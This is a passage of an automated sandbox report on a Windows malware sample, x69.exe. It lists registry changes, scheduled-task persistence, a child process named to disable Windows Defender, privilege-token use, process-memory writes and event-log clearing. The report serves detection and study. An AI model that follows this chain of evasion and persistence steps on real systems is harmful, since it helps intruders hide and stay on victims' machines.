description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={63A21001-DC59-4210-ABDB-A980EF09886A}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1747714452" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-c4-75-2d-b8-0a\WpadDecision = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 20 May 2025 04:14:12 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-c4-75-2d-b8-0a\WpadDecisionReason = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE -
Modifies registry class 45 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\NodeSlot = "3" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 Explorer.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = ffffffff Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5000310000000000995a4d6f100041646d696e003c0009000400efbe995af166b45a8f212e000000d20501000000040000000000000000000000000000005efbe900410064006d0069006e00000014000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 7800310000000000995af1661100557365727300640009000400efbe874f7748b45a8f212e000000fd0100000000010000000000000000003a00000000000ba6c40055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 Explorer.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\NodeSlot = "2" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe110000009a627c54e1b5db01a46ba08b3dc9db01ee4eef8b3dc9db0114000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 5600310000000000b45ab12110005443505669657700400009000400efbeb45ab021b45ab1212e00000050820200000009000000000000000000000000000000c20015015400430050005600690065007700000016000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 8400310000000000b45aac211100444f574e4c4f7e3100006c0009000400efbe995af166b45aac212e000000f3050100000002000000000000000000420000000000354c660044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018000000 Explorer.EXE -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\Downloads\TCPView.zip:Zone.Identifier firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 568 schtasks.exe 932 schtasks.exe 4796 schtasks.exe 2392 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 3640 x69.exe 3664 Explorer.EXE 3664 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5712 powershell.exe 5712 powershell.exe 5872 powershell.exe 5872 powershell.exe 2692 powershell.exe 2692 powershell.exe 5548 powershell.exe 5548 powershell.exe 5548 powershell.exe 2092 powershell.exe 2092 powershell.exe 2092 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1252 powershell.exe 1252 powershell.exe 1252 powershell.exe 5464 powershell.EXE 5464 powershell.EXE 2140 powershell.exe 2140 powershell.exe 232 powershell.exe 232 powershell.exe 232 powershell.exe 2140 powershell.exe 2492 powershell.exe 2492 powershell.exe 2492 powershell.exe 4284 powershell.EXE 4284 powershell.EXE 5060 powershell.exe 5060 powershell.exe 5300 powershell.exe 5300 powershell.exe 5060 powershell.exe 5300 powershell.exe 5472 powershell.exe 5472 powershell.exe 5472 powershell.exe 1784 powershell.exe 1784 powershell.exe 1656 powershell.exe 1656 powershell.exe 1784 powershell.exe 1656 powershell.exe 5252 powershell.exe 5252 powershell.exe 5252 powershell.exe 4124 powershell.exe 4124 powershell.exe 376 powershell.exe 376 powershell.exe 4124 powershell.exe 376 powershell.exe 556 powershell.exe 556 powershell.exe 5680 powershell.exe 5680 powershell.exe 556 powershell.exe 5680 powershell.exe 1760 powershell.exe 1760 powershell.exe 4896 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3664 Explorer.EXE 3288 tcpview64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5348 x69.exe Token: SeDebugPrivilege 5712 powershell.exe Token: SeIncreaseQuotaPrivilege 5712 powershell.exe Token: SeSecurityPrivilege 5712 powershell.exe Token: SeTakeOwnershipPrivilege 5712 powershell.exe Token: SeLoadDriverPrivilege 5712 powershell.exe Token: SeSystemProfilePrivilege 5712 powershell.exe Token: SeSystemtimePrivilege 5712 powershell.exe Token: SeProfSingleProcessPrivilege 5712 powershell.exe Token: SeIncBasePriorityPrivilege 5712 powershell.exe Token: SeCreatePagefilePrivilege 5712 powershell.exe Token: SeBackupPrivilege 5712 powershell.exe Token: SeRestorePrivilege 5712 powershell.exe Token: SeShutdownPrivilege 5712 powershell.exe Token: SeDebugPrivilege 5712 powershell.exe Token: SeSystemEnvironmentPrivilege 5712 powershell.exe Token: SeRemoteShutdownPrivilege 5712 powershell.exe Token: SeUndockPrivilege 5712 powershell.exe Token: SeManageVolumePrivilege 5712 powershell.exe Token: 33 5712 powershell.exe Token: 34 5712 powershell.exe Token: 35 5712 powershell.exe Token: 36 5712 powershell.exe Token: SeDebugPrivilege 3640 x69.exe Token: SeDebugPrivilege 1332 x69.exe Token: SeDebugPrivilege 5872 powershell.exe Token: SeIncreaseQuotaPrivilege 5872 powershell.exe Token: SeSecurityPrivilege 5872 powershell.exe Token: SeTakeOwnershipPrivilege 5872 powershell.exe Token: SeLoadDriverPrivilege 5872 powershell.exe Token: SeSystemProfilePrivilege 5872 powershell.exe Token: SeSystemtimePrivilege 5872 powershell.exe Token: SeProfSingleProcessPrivilege 5872 powershell.exe Token: SeIncBasePriorityPrivilege 5872 powershell.exe Token: SeCreatePagefilePrivilege 5872 powershell.exe Token: SeBackupPrivilege 5872 powershell.exe Token: SeRestorePrivilege 5872 powershell.exe Token: SeShutdownPrivilege 5872 powershell.exe Token: SeDebugPrivilege 5872 powershell.exe Token: SeSystemEnvironmentPrivilege 5872 powershell.exe Token: SeRemoteShutdownPrivilege 5872 powershell.exe Token: SeUndockPrivilege 5872 powershell.exe Token: SeManageVolumePrivilege 5872 powershell.exe Token: 33 5872 powershell.exe Token: 34 5872 powershell.exe Token: 35 5872 powershell.exe Token: 36 5872 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeIncreaseQuotaPrivilege 2692 powershell.exe Token: SeSecurityPrivilege 2692 powershell.exe Token: SeTakeOwnershipPrivilege 2692 powershell.exe Token: SeLoadDriverPrivilege 2692 powershell.exe Token: SeSystemProfilePrivilege 2692 powershell.exe Token: SeSystemtimePrivilege 2692 powershell.exe Token: SeProfSingleProcessPrivilege 2692 powershell.exe Token: SeIncBasePriorityPrivilege 2692 powershell.exe Token: SeCreatePagefilePrivilege 2692 powershell.exe Token: SeBackupPrivilege 2692 powershell.exe Token: SeRestorePrivilege 2692 powershell.exe Token: SeShutdownPrivilege 2692 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeSystemEnvironmentPrivilege 2692 powershell.exe Token: SeRemoteShutdownPrivilege 2692 powershell.exe Token: SeUndockPrivilege 2692 powershell.exe -
Suspicious use of FindShellTrayWindow 21 IoCs
pid Process 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3664 Explorer.EXE 1840 RuntimeBroker.exe -
Suspicious use of SendNotifyMessage 49 IoCs
pid Process 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 1840 RuntimeBroker.exe 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3188 firefox.exe 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3664 Explorer.EXE 3288 tcpview64.exe 3288 tcpview64.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5348 wrote to memory of 5712 5348 x69.exe 85 PID 5348 wrote to memory of 5712 5348 x69.exe 85 PID 5348 wrote to memory of 4796 5348 x69.exe 89 PID 5348 wrote to memory of 4796 5348 x69.exe 89 PID 5348 wrote to memory of 3640 5348 x69.exe 93 PID 5348 wrote to memory of 3640 5348 x69.exe 93 PID 5348 wrote to memory of 5872 5348 x69.exe 94 PID 5348 wrote to memory of 5872 5348 x69.exe 94 PID 4944 wrote to memory of 1332 4944 cmd.exe 96 PID 4944 wrote to memory of 1332 4944 cmd.exe 96 PID 5348 wrote to memory of 2392 5348 x69.exe 97 PID 5348 wrote to memory of 2392 5348 x69.exe 97 PID 5348 wrote to memory of 3192 5348 x69.exe 101 PID 5348 wrote to memory of 3192 5348 x69.exe 101 PID 5348 wrote to memory of 3192 5348 x69.exe 101 PID 5348 wrote to memory of 2692 5348 x69.exe 102 PID 5348 wrote to memory of 2692 5348 x69.exe 102 PID 5816 wrote to memory of 2368 5816 cmd.exe 104 PID 5816 wrote to memory of 2368 5816 cmd.exe 104 PID 5816 wrote to memory of 2368 5816 cmd.exe 104 PID 3192 wrote to memory of 4008 3192 x69Disable-winDefender.exe 105 PID 3192 wrote to memory of 4008 3192 x69Disable-winDefender.exe 105 PID 3192 wrote to memory of 4008 3192 x69Disable-winDefender.exe 105 PID 2368 wrote to memory of 3792 2368 x69Disable-winDefender.exe 106 PID 2368 wrote to memory of 3792 2368 x69Disable-winDefender.exe 106 PID 3192 wrote to memory of 6028 3192 x69Disable-winDefender.exe 109 PID 3192 wrote to memory of 6028 3192 x69Disable-winDefender.exe 109 PID 3792 wrote to memory of 400 3792 cmd.exe 111 PID 3792 wrote to memory of 400 3792 cmd.exe 111 PID 6028 wrote to memory of 5160 6028 cmd.exe 112 PID 6028 wrote to memory of 5160 6028 cmd.exe 112 PID 3792 wrote to memory of 5548 3792 cmd.exe 113 PID 3792 wrote to memory of 5548 3792 cmd.exe 113 PID 6028 wrote to memory of 2092 6028 cmd.exe 114 PID 6028 wrote to memory of 2092 6028 cmd.exe 114 PID 3792 wrote to memory of 1984 3792 cmd.exe 115 PID 3792 wrote to memory of 1984 3792 cmd.exe 115 PID 5348 wrote to memory of 568 5348 x69.exe 179 PID 5348 wrote to memory of 568 5348 x69.exe 179 PID 6028 wrote to memory of 1252 6028 cmd.exe 209 PID 6028 wrote to memory of 1252 6028 cmd.exe 209 PID 5348 wrote to memory of 1568 5348 x69.exe 122 PID 5348 wrote to memory of 1568 5348 x69.exe 122 PID 5348 wrote to memory of 1568 5348 x69.exe 122 PID 1568 wrote to memory of 1368 1568 x69install.exe 123 PID 1568 wrote to memory of 1368 1568 x69install.exe 123 PID 1568 wrote to memory of 1368 1568 x69install.exe 123 PID 3140 wrote to memory of 1140 3140 cmd.exe 124 PID 3140 wrote to memory of 1140 3140 cmd.exe 124 PID 3140 wrote to memory of 1140 3140 cmd.exe 124 PID 3792 wrote to memory of 2140 3792 cmd.exe 129 PID 3792 wrote to memory of 2140 3792 cmd.exe 129 PID 6028 wrote to memory of 232 6028 cmd.exe 130 PID 6028 wrote to memory of 232 6028 cmd.exe 130 PID 3640 wrote to memory of 2492 3640 x69.exe 131 PID 3640 wrote to memory of 2492 3640 x69.exe 131 PID 6028 wrote to memory of 5300 6028 cmd.exe 133 PID 6028 wrote to memory of 5300 6028 cmd.exe 133 PID 3792 wrote to memory of 5060 3792 cmd.exe 134 PID 3792 wrote to memory of 5060 3792 cmd.exe 134 PID 3640 wrote to memory of 5472 3640 x69.exe 135 PID 3640 wrote to memory of 5472 3640 x69.exe 135 PID 3792 wrote to memory of 1784 3792 cmd.exe 137 PID 3792 wrote to memory of 1784 3792 cmd.exe 137 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:936
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a19242dc-96bb-48ca-9b49-86f1ad87c554}2⤵PID:420
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3f5ca867-fddd-4c7c-b435-bd2d7a17afcf}2⤵PID:5312
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:972
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1080
-
